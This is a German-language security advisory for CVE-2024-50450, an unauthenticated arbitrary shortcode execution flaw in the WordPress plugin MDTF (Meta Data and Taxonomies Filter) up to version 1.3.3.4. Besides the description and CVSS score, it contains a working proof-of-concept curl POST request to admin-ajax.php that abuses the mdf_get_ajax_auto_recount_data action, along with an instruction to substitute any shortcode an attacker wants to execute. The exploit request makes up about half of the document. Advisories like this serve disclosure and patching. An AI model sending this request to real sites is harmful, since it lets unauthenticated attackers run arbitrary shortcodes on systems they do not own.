
WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Unauthentifizierte beliebige Shortcode-Ausführung
WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Nicht authentifizierte beliebige Shortcode-Ausführung
Das MDTF – Meta Data and Taxonomies Filter Plugin für WordPress ist in allen Versionen bis einschließlich 1.3.3.4 anfällig für die Ausführung beliebiger Shortcodes. Dies liegt daran, dass die Software Benutzern erlaubt, eine Aktion auszuführen, die einen Wert nicht ordnungsgemäß validiert, bevor do_shortcode ausgeführt wird. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Shortcodes auszuführen.
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50450
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSS Score: 7.3
Slugs: wp-meta-data-filter-and-taxonomy-filter
Ändern Sie [contact_7] in den Shortcut-Code, den Sie ausführen möchten.
curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=mdf_get_ajax_auto_recount_data" \
-d "mdf_front_qtrans_lang=en" \
-d "mdf_front_wpml_lang=en" \
-d "mdf_is_search_going=1" \
-d "mdf_tmp_order=asc" \
-d "mdf_tmp_orderby=date" \
-d "no_wp_die=true" \
-d "mdf_ajax_request=true" \
-d "mdf_cat=category_slug" \
-d "page_mdf=1" \
-d "slug=page_slug" \
-d "type=shortcode" \
-d "shortcode_id=shortcode_id_value" \
-d "mdf_ajax_content_redraw=true" \
-d "shortcode_txt=[contact_7]" \
http://kubernetes.docker.internal/wp-admin/admin-ajax.php